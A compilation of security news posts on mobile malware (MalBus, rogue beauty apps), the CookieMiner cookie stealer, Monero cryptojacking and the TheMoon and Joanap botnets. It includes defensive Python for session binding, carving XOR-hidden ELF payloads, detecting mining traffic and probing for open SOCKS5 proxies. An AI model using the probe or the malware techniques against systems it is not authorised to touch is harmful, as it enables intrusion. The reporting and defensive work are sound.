The photo editing and beauty apps included code able to perform a broad range of malicious activities.

Experts estimate that three of the tainted applications (Pro Camera Beauty, Cartoon Art Photo, Emoji Camera) were downloaded more than a million times each. Artistic Effect Filter was downloaded over 500,000 times, and seven other rogue apps were installed over 100,000 times each.

“We discovered several beauty camera apps (detected as AndroidOS_BadCamera.HRX) on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes.” reads the analysis published by Trend Micro.

“Some of these have already been downloaded millions of times, which is unsurprising given the popularity of these kinds of apps.”

An Android user who downloads one of the malicious apps will not immediately notice any suspicious behavior.

Once installed, some of these apps redirect users to phishing websites, while others push full-screen advertisements for fraudulent or pornographic content every time the victim unlocks the device.

Some of the beauty apps included malicious code that uploads the user's photos to a remote server controlled by the author. Instead of getting the edited photo back, the user gets a picture with a fake update prompt.

“However, instead of getting a final result with the edited photo, the user gets a picture with a fake update prompt in nine different languages.” continues the analysis.

“The authors can collect the photos uploaded in the app, and possibly use them for malicious purposes — for example as fake profile pics in social media.”

Some of the beauty apps use packers to hinder analysis by security firms; they also hide their icon from the application list to make it harder for users to find and uninstall them.

TrendMicro reported the list of malicious apps to Google that quickly removed them from the Play Store.

Experts recommend installing mobile apps only from the official store and only from known, trusted developers. Users should also check app reviews and never install applications for which anomalous behavior has been reported.

Additional info, including Indicators of Compromise (IoCs) are reported in the post published by Trend Micro.

Pierluigi Paganini

(Security Affairs – beauty apps, malware)

The post Experts found popular beauty apps in the Play Store including malicious code appeared first on Security Affairs.

CookieMiner: Steals Passwords From Cookies, Chrome And iPhone Texts!



A new piece of macOS malware, CookieMiner, harvests saved passwords and credit-card data from Chrome, iPhone text messages backed up to the Mac via iTunes, and browser cookies.

Security researchers recently uncovered this malware, which harvests saved user credentials such as usernames and passwords.

It mainly targets passwords and credit-card details saved in Google Chrome, as well as iPhone text messages backed up to the Mac.

The malware also steals the browser cookies associated with major cryptocurrency exchanges and wallet-service websites the user has visited.

The apparent motive is to bypass the multi-factor authentication those sites enforce.

Having sidestepped that control, the attacker is free to log into the victim's exchange account or wallet and drain the funds held there.

Web cookies are small pieces of data that the web server hands to the browser when a user signs in; the browser stores them and sends them back with every request to prove the session is authenticated.

Stealing those cookies therefore amounts to stealing the user's authenticated session.

Cookie theft is the easiest way to dodge login anomaly detection: if a stolen username and password are used from an unfamiliar device, alarms may go off and an additional authentication challenge may be sent.

If the username and password are used together with the cookie, however, the whole session looks legitimate and no alert is raised.

Most wallet and cryptocurrency exchange websites enforce multi-factor authentication.

CookieMiner gathers the stolen cookies, saved credentials and text messages (where one-time codes are often delivered) so that the attacker can combine them and slide past the authentication process.

For an attacker such an opportunity is a gold mine, and a lot can be won from it.
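The server-side check that closes this gap, as an added example written for this page rather than code from the CookieMiner report or from any exchange: an in-memory session store binds each token to an HMAC of the client's User-Agent and network prefix, so a cookie replayed from the attacker's own host fails even though the token itself is valid. The store, the fingerprint inputs and the constructed victim/attacker contexts are assumptions.

```python
"""Bind a session cookie to the client it was issued to (added example)."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class ClientContext:
    """What the server can observe about the client presenting the cookie."""
    user_agent: str
    ip_prefix: str  # e.g. the /24 the request came from, to tolerate address churn


SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret; generated here for the demo
SESSIONS: Dict[str, dict] = {}         # token -> session record (in-memory stand-in for a DB)


def fingerprint(ctx: ClientContext) -> str:
    """Keyed hash of the client context, so a stored fingerprint reveals nothing about it."""
    data = (ctx.user_agent + "|" + ctx.ip_prefix).encode()
    return hmac.new(SERVER_KEY, data, hashlib.sha256).hexdigest()


def create_session(user: str, ctx: ClientContext) -> str:
    """Issue a random session token and remember which client context it belongs to."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = {"user": user, "fp": fingerprint(ctx)}
    return token


def validate_cookie_only(token: str) -> Optional[str]:
    """Weak check: the cookie alone proves the session. A stolen cookie passes."""
    record = SESSIONS.get(token)
    return record["user"] if record else None


def validate_bound(token: str, ctx: ClientContext) -> Optional[str]:
    """Hardened check: the cookie must arrive from the context it was issued to."""
    record = SESSIONS.get(token)
    if record is None or not hmac.compare_digest(record["fp"], fingerprint(ctx)):
        return None
    return record["user"]


# Constructed contexts: the victim's Mac and the attacker's replay host.
VICTIM = ClientContext("Mozilla/5.0 (Macintosh) Safari/605.1.15", "198.51.100.0/24")
ATTACKER = ClientContext("curl/7.64.0", "203.0.113.0/24")


def demo() -> Tuple[Optional[str], Optional[str], Optional[str]]:
    """Returns (cookie-only result for the attacker, bound result for the attacker,
    bound result for the victim) for a session issued to the victim."""
    token = create_session("alice", VICTIM)          # victim logs in; the stealer grabs the token
    return (validate_cookie_only(token),             # attacker replays: accepted
            validate_bound(token, ATTACKER),         # attacker replays: rejected
            validate_bound(token, VICTIM))           # victim keeps working


if __name__ == "__main__":
    print(demo())   # expected: ('alice', None, 'alice')
```

Fingerprint binding raises the bar rather than closing the hole: an attacker who proxies through the infected Mac, or copies its User-Agent and sits behind the same network, still matches. Pair it with short session lifetimes and re-authentication for sensitive actions such as withdrawals.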

In addition to Google's Chrome, Apple's Safari is also targeted. The choice of browser targets appears to follow their popularity.

The malware has an additional malicious component: it also downloads a coin-mining payload onto the affected system.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play install counts show, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5. Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with the file extension ".mov" to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function, implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan into the running app's directory masquerading as a libpng.2.1.so file. The dropped trojan is embedded in LibMovie.so XOR'ed and is decoded at runtime. After setting permissions on the dropped file, the address of the exported function "Libfunc" in the dropped trojan is retrieved dynamically using dlsym(). The dropped binary is then deleted from the filesystem to avoid detection and, finally, Libfunc is executed.
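A static way to recover such an embedded, XOR-encoded payload, as an added example that is not McAfee's tooling: it searches a carrier blob for the ELF magic under every single-byte key, validates the decoded header, and carves the image using the end of the section header table as its length. The carrier and the hidden image are constructed in the script so it runs offline; the key, the body contents and the ELF32/ARM layout are assumptions, not MalBus's actual encoding.

```python
"""Carve a single-byte-XOR'ed ELF image out of a carrier blob (added example)."""
import struct
from typing import Optional, Tuple

ELF_MAGIC = b"\x7fELF"


def elf_image_length(hdr: bytes) -> Optional[int]:
    """Size of an ELF image as implied by its header: the end of the section
    header table. Handles little-endian ELF32/ELF64; None if malformed."""
    if len(hdr) < 52 or hdr[:4] != ELF_MAGIC or hdr[5] != 1:   # EI_DATA 1 = little-endian
        return None
    if hdr[4] == 1:                                             # EI_CLASS 1 = ELF32
        (e_shoff,) = struct.unpack_from("<I", hdr, 0x20)
        e_shentsize, e_shnum = struct.unpack_from("<HH", hdr, 0x2E)
    elif hdr[4] == 2 and len(hdr) >= 64:                        # EI_CLASS 2 = ELF64
        (e_shoff,) = struct.unpack_from("<Q", hdr, 0x28)
        e_shentsize, e_shnum = struct.unpack_from("<HH", hdr, 0x3A)
    else:
        return None
    return e_shoff + e_shentsize * e_shnum if e_shnum else None


def find_xored_elf(blob: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Search blob for the ELF magic under every non-zero single-byte XOR key.
    Returns (offset, key, carved_image) or None. Key 0 is skipped on purpose:
    the carrier library itself starts with a plaintext ELF header."""
    for key in range(1, 256):
        needle = bytes(b ^ key for b in ELF_MAGIC)
        off = blob.find(needle)
        while off != -1:
            hdr = bytes(b ^ key for b in blob[off:off + 64])
            length = elf_image_length(hdr)
            if length is not None and off + length <= len(blob):
                image = bytes(b ^ key for b in blob[off:off + length])
                return off, key, image
            off = blob.find(needle, off + 1)
    return None


def build_fake_elf32(body: bytes) -> bytes:
    """Constructed minimal little-endian ELF32 image (ARM, e_machine 40): a
    52-byte header, an opaque body and one zeroed 40-byte section header."""
    e_shoff = 52 + len(body)
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\0" * 8      # ELF32, LE, version 1
    rest = struct.pack("<HHIIIIIHHHHHH",
                       2, 40, 1, 0x8000, 0, e_shoff, 0,         # type, machine, version, entry, phoff, shoff, flags
                       52, 32, 0, 40, 1, 0)                     # ehsize, phentsize, phnum, shentsize, shnum, shstrndx
    return e_ident + rest + body + b"\0" * 40


# Constructed carrier: a plain ELF "library" with the XOR'ed payload appended,
# standing in for LibMovie.so with its embedded trojan. Key chosen for the demo.
KEY = 0x5A
HIDDEN = build_fake_elf32(b"fake trojan body")
CARRIER = (build_fake_elf32(b"carrier lib") + b"JUNK"
           + bytes(b ^ KEY for b in HIDDEN) + b"TRAILER")


if __name__ == "__main__":
    hit = find_xored_elf(CARRIER)
    if hit:
        off, key, image = hit
        print("embedded ELF at offset %d, key 0x%02x, %d bytes" % (off, key, len(image)))
```

On a real sample, run find_xored_elf over the bytes of the native library; a hit whose carved image has a sane header is worth loading into a disassembler directly, without ever executing the dropper. Payloads encoded with a multi-byte key will not be found by this single-byte scan.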

Figure 6. Toast message when malware is installed

In a separate forked process, it tries to access the "naver.property" file on an installed SD card, if there is one, and if it succeeds, it tries to start the ".KaKaoTalk" activity, which displays a Google phishing page (more on that in the next section). The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

The KakaoTalk class opens a local HTML file, javapage.html, with the email address registered on the infected device pre-filled, so the page appears to log the user into their own account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts by the malware author to abuse legitimate Google services:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

Trojan

In addition to the Google phishing page, when the "Libfunc" function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is fully compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called "doMainProc()". Please note that there are a few variants of the trojan with different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of the hardcoded C2 servers looks like the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16. Servers connected before entering command loop

Among these commands, directory indexing is particularly important. The directory structure is saved in a file named "kakao.property" and, while indexing the given path on the user's device, the trojan checks file names against a list of specific keywords; if one matches, it uploads the file to the remote upload server. The keywords are Korean; their English translations are listed in the following table:

Figure 17. Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18. Keyword matching file upload server

Conclusion

Applications can easily trick users into installing them and then leak sensitive information. It is also not uncommon to see malware sneaking onto the official Google Play store, which makes it hard for users to protect their devices. This malware was not written for ordinary phishing attempts but for very targeted attacks, searching victims' devices for files related to the military and politics, likely in order to leak confidential information. Users should only install applications they fully trust, even when those come from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes (SHA-256)

Initial Downloader (APK)
• 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
• bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
• 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
• e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

Fake Plugin (APK)
• ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
• b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

Trojan (additional payload)
• b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
• 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
• 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
• 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware

An analysis of more than 4.4 million malware samples showed that botnets were responsible for mining at least 4.3 percent of all Monero in circulation over a 12-year period.

These illicit efforts generated an estimated $56 million for cybercriminals behind the campaigns. The study from academics in the U.K. and Spain used a combination of both dynamic and static analysis techniques to pull details from the malware campaigns, including an exploration of the mining pools where payments were made as well as cryptocurrency addresses. Over the 12 years, Monero (XMR) was the most popular cryptocurrency targeted by botnets, the study concluded.

New Crypto-Mining Threat Groups Discovered

While the research paper mentioned previously known malware campaigns such as Smominru and Adylkuzz, the study’s authors also noted some new threat actors. These included Freebuf and USA-138, which used general-purpose botnets rather than renting third-party infrastructure to carry out their mining operations.

Though the latter technique tended to be more successful based on the analyses in the study, the findings are a reminder that cybercriminals are highly capable of using legitimate file management tools and code repositories for illicit purposes.

Since mining pools are known to ban suspicious XMR addresses from time to time, and because mining protocols are subject to change, the researchers concluded that some malware authors often modified their code. Some of these campaigns are still active, while others were relatively brief, according to the paper.

In terms of methodology, the researchers said xmrig, an open-source tool, was most commonly used to build the malware strains that powered crypto-mining bots.

Catching Crypto-Mining Before It Happens

Beyond the money it generates for threat actors, malicious crypto-mining, also known as cryptojacking, has the secondary adverse impact of draining an organization's central processing unit (CPU) resources.

IBM X-Force research published last year confirmed that crypto-mining has grown significantly over the past few years and needs to become an active part of IT security monitoring. As it becomes a more persistent threat, utilizing security information and event management (SIEM) tools combined with strong endpoint protection is one of the best ways to ensure your technology infrastructure doesn’t become a place for criminals to harvest Monero.
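Detection logic of the kind such SIEM monitoring needs, as an added example that is not from the IBM article or from the paper it summarizes. It scans constructed proxy log lines (a simplified "timestamp src dst:port payload" layout, not a real export) for the Stratum JSON-RPC login that xmrig-derived miners send, an XMRig agent string, a Monero wallet used as the pool login, and destination ports commonly used by public pools. The port list and the placeholder wallet are assumptions to tune locally.

```python
"""Flag likely Monero-mining traffic in proxy/firewall logs (added example)."""
import json
import re
from typing import Dict, List

# Assumed set of ports commonly used by public XMR pools; tune for your environment.
MINING_PORTS = {3333, 4444, 5555, 7777, 14444}
# Stratum methods: "login"/"submit"/"keepalived" (xmrig-style) and the classic mining.* ones.
STRATUM_METHODS = {"login", "submit", "keepalived", "mining.subscribe", "mining.authorize"}
# Standard Monero address: 95 base58 chars starting with 4 (primary) or 8 (subaddress).
XMR_ADDR = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+):(\d+) (.*)$")

# Constructed placeholder wallet (valid shape only) and constructed log lines.
FAKE_WALLET = "4" + "AB1x" * 23 + "AB"
SAMPLE_LOG = "\n".join([
    "2019-02-01T10:00:01Z 10.0.0.5 203.0.113.10:443 GET /index.html",
    '2019-02-01T10:00:02Z 10.0.0.7 198.51.100.4:3333 {"id":1,"jsonrpc":"2.0","method":"login",'
    '"params":{"login":"%s","pass":"x","agent":"XMRig/2.14.1"}}' % FAKE_WALLET,
    '2019-02-01T10:00:03Z 10.0.0.9 192.0.2.8:14444 {"id":1,"jsonrpc":"2.0","method":"login",'
    '"params":{"login":"worker1","pass":"x","agent":"XMRig/5.5.0"}}',
    "2019-02-01T10:00:04Z 10.0.0.5 203.0.113.10:443 POST /api/v1/upload",
    "2019-02-01T10:00:05Z 10.0.0.12 192.0.2.9:80 GET /health",
])


def classify(line: str) -> Dict:
    """Return a finding dict for a suspicious line, or {} for a benign/unparsable one."""
    m = LINE_RE.match(line)
    if not m:
        return {}
    ts, src, dst, port, payload = m.groups()
    reasons: List[str] = []
    try:
        msg = json.loads(payload)
    except ValueError:
        msg = None
    if isinstance(msg, dict) and msg.get("jsonrpc") == "2.0" and msg.get("method") in STRATUM_METHODS:
        reasons.append("stratum json-rpc %s" % msg["method"])
        params = msg.get("params")
        params = params if isinstance(params, dict) else {}
        agent = str(params.get("agent", ""))
        if agent.lower().startswith("xmrig"):
            reasons.append("miner agent %s" % agent)
        if XMR_ADDR.search(str(params.get("login", ""))):
            reasons.append("monero wallet as login")
    if int(port) in MINING_PORTS:
        reasons.append("pool port %s" % port)
    if not reasons:
        return {}
    return {"ts": ts, "src": src, "dst": "%s:%s" % (dst, port), "reasons": reasons}


def scan_log(text: str) -> List[Dict]:
    """Run classify over every line and keep the hits, most evidence first."""
    hits = [h for h in (classify(l) for l in text.splitlines()) if h]
    return sorted(hits, key=lambda h: -len(h["reasons"]))


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["src"], "->", hit["dst"], ";", "; ".join(hit["reasons"]))
```

A port match on its own is weak evidence; the protocol-level indicators (Stratum login, miner agent, wallet as login) are what justify an alert, which is why hits are ranked by how many reasons they accumulate. Miners that tunnel Stratum over TLS hide the payload, so pair this with endpoint telemetry on sustained CPU use.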

The post Cybercriminals Generated $56 Million Over 12 Years From Monero Crypto-Mining Malware appeared first on Security Intelligence.

A week in security (January 28 – February 3)

Last week, we ran another in our interview with a malware hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light on a Houzz data breach, and what exactly happened between Apple and Facebook.

Other cybersecurity news

  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out its vision of what is and isn't acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.

Can AI Become Our New Cybersecurity Sheriff?

Two hospitals in Ohio and West Virginia turned patients away due to a ransomware attack that led to a system failure. The hospitals could not process any emergency patient requests. Hence,

The post Can AI Become Our New Cybersecurity Sheriff? appeared first on The Cyber Security Place.

Several Popular Beauty Camera Apps Caught Stealing Users’ Photos

Just because an app is available on Google Play Store doesn't mean that it is a legitimate app. Despite so many efforts by Google, some fake and malicious apps do sneak in and land millions of unaware users on the hunting ground of scammers and hackers. Cybersecurity firm Trend Micro uncovered at least 29 devious photo apps that managed to make its way onto Google Play Store and have been

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: 20% discount (Kindle Edition and paper copy).

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a person's audio before they answer
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacy's Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employees' data
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Korea's Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.


Security Affairs: Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at CenturyLink Threat Research Labs observed a new evolution of the TheMoon IoT botnet: its operators added a previously undocumented module that lets them offer the botnet under a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least six IoT device exploits to the bot's code. The botnet targets broadband modems and routers from several vendors, including Linksys, ASUS, MikroTik, D-Link and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals that targeted the Dasan GPON routers were using another new zero-day flaw affecting the same routers and recruit them in their botnet.

Now CenturyLink Threat Research Labs has collected evidence that the botnet's operator has sold this proxy botnet as a service to other cybercrime gangs, which used it for credential brute forcing, video advertisement fraud, general traffic obfuscation and more.

Experts noticed several devices performing credential brute-force attacks on multiple popular websites, then uncovered a C2 operating at 91[.]215[.]158[.]118. This address was associated with a previous TheMoon campaign.

Experts also uncovered a video ad fraud operator using TheMoon: a single server received requests for 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as SOCKS5 proxies, offering network proxying as a service.
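The handshake such a proxy module answers, as an added example that is neither CenturyLink's code nor TheMoon's: a minimal SOCKS5 client exchange per RFC 1928, with the device side simulated in-process by a constructed stand-in, plus a network probe for auditing your own address space. A device that answers the greeting with method 0x00 (no authentication) and then accepts a CONNECT is an open relay of the kind the botnet rents out. The addresses and ports used are assumptions.

```python
"""SOCKS5 CONNECT exchange, both sides, with an offline stand-in for the proxy (added example)."""
import socket
import struct
from typing import Callable, Tuple

VER, NO_AUTH, NO_ACCEPTABLE = 0x05, 0x00, 0xFF
CMD_CONNECT, ATYP_IPV4 = 0x01, 0x01


def client_greeting() -> bytes:
    """VER | NMETHODS | METHODS: offer only 'no authentication required'."""
    return bytes([VER, 1, NO_AUTH])


def parse_method_select(reply: bytes) -> bool:
    """True when the server picked the no-auth method, i.e. anyone may use it."""
    return len(reply) == 2 and reply[0] == VER and reply[1] == NO_AUTH


def connect_request(host: str, port: int) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT for an IPv4 CONNECT."""
    return bytes([VER, CMD_CONNECT, 0x00, ATYP_IPV4]) + socket.inet_aton(host) + struct.pack("!H", port)


def parse_connect_reply(reply: bytes) -> Tuple[int, str, int]:
    """Return (REP, BND.ADDR, BND.PORT); REP 0x00 means the relay was established."""
    if len(reply) < 10 or reply[0] != VER or reply[3] != ATYP_IPV4:
        raise ValueError("unexpected SOCKS5 reply: %r" % reply)
    (port,) = struct.unpack("!H", reply[8:10])
    return reply[1], socket.inet_ntoa(reply[4:8]), port


def fake_open_proxy(request: bytes) -> bytes:
    """Constructed stand-in for the infected device: accepts no-auth and every CONNECT."""
    if len(request) == 3 and request[0] == VER:               # greeting
        return bytes([VER, NO_AUTH])
    if len(request) >= 10 and request[1] == CMD_CONNECT:      # connect request
        return bytes([VER, 0x00, 0x00, ATYP_IPV4]) + socket.inet_aton("192.0.2.1") + struct.pack("!H", 40000)
    return bytes([VER, NO_ACCEPTABLE])


def handshake(exchange: Callable[[bytes], bytes], host: str, port: int) -> Tuple[bool, int]:
    """Drive the two-step SOCKS5 exchange through `exchange` (a send-and-receive callable).
    Returns (open_proxy, rep): open_proxy is True only if no auth was required AND the
    CONNECT to host:port succeeded, which is what an abusable relay looks like."""
    if not parse_method_select(exchange(client_greeting())):
        return False, -1
    rep, _, _ = parse_connect_reply(exchange(connect_request(host, port)))
    return rep == 0x00, rep


def probe(target: str, socks_port: int = 1080, timeout: float = 3.0) -> Tuple[bool, int]:
    """Network version for auditing your own devices: talks to target:socks_port over TCP."""
    with socket.create_connection((target, socks_port), timeout=timeout) as s:
        def exchange(data: bytes) -> bytes:
            s.sendall(data)
            return s.recv(64)
        return handshake(exchange, "192.0.2.1", 80)   # documentation address as a harmless CONNECT target


if __name__ == "__main__":
    print(handshake(fake_open_proxy, "192.0.2.1", 80))   # expected: (True, 0)
```

Run probe() only against devices you are authorized to test; the CONNECT target is a documentation address so that a positive result never relays real traffic anywhere. TheMoon's module may listen on a port other than 1080, so sweep the ports your flow data shows the suspect devices accepting connections on.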

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.

Further details, including IoCs, are reported in the analysis published by CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.




Security Affairs: US authorities aim to dismantle North Korea’s Joanap Botnet

FBI and Air Force experts are sinkholing the Joanap botnet to collect information about it and dismantle the malicious infrastructure.

The U.S. Justice Department has declared war on the Joanap botnet, which is associated with North Korea.

The U.S. DoJ announced this week that it is working to dismantle the infamous Joanap botnet, a malicious infrastructure believed to be associated with Pyongyang.

The FBI and the U.S. Air Force Office of Special Investigations (AFOSI) obtained court orders and search warrants that allow them to conduct sinkholing of the Joanap botnet.

The Joanap bot is a remote access trojan (RAT) that allows the attackers to exfiltrate data from compromised systems; it supports many commands and is also able to drop additional payloads.

The authorities set up servers that mimic the botnet’s communication system in order to collect information on infected systems and share it with ISPs and the owners of the compromised computers.

The U.S. authorities will also inform foreign victims through the FBI’s Legal Attachés, who work with the law enforcement and security agencies in their countries.

The Joanap botnet has been around since 2009; experts pointed out that the threat is still spreading through unpatched systems and unprotected networks. The bot is delivered by the Brambul SMB worm, which spreads through a network by brute-forcing SMB shares using a list of hard-coded credentials.

Experts linked both the Joanap and Brambul malware to the North Korea-linked Hidden Cobra APT group.

The Joanap bot infected systems in many industries, including media, aerospace, financial, and critical infrastructure sectors across the world.

